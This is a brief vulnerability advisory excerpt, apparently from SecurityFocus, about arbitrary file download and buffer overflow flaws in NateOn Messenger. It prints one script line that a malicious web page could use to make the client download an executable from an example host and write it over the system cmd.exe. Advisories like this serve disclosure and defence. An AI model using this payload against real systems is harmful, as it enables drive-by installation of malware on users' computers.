|
NateOn Messenger Arbitrary File Download And Buffer Overflow Vulnerabilities
To exploit the arbitrary file download vulnerability, a malicious Web page may include the following script code: GotNate.Excute("1",'http://www.example.com/somefile.exe','c:\\windows\\system32\\cmd.exe'); Currently we are not aware of any exploits for the buffer overflow issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>. |
|
|
Privacy Statement |
